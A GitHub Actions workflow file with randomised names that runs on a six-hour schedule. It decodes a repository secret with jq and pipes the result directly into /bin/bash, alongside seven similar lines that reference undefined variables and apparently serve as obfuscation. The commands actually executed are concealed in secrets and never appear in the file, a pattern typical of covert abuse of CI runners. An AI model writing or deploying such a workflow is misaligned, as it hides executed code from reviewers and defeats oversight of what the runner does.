name: sunli19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '2 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sunli19871010
        env:
          eldvy4: ${{ secrets.eldvy4 }}
        run: |
          echo $eldvy4 | jq -r .ox31904 | /bin/bash
          echo $bgk97302 | jq -r .dwnev59 | /bin/bash
          echo $ag01 | jq -r .vktjt01745 | /bin/bash
          echo $qv38 | jq -r .meowc68 | /bin/bash
          echo $i4413 | jq -r .jq8 | /bin/bash
          echo $oap4355 | jq -r .lk9 | /bin/bash
          echo $vcv2 | jq -r .ur70361 | /bin/bash
          echo $gy270 | jq -r .nyo3 | /bin/bash

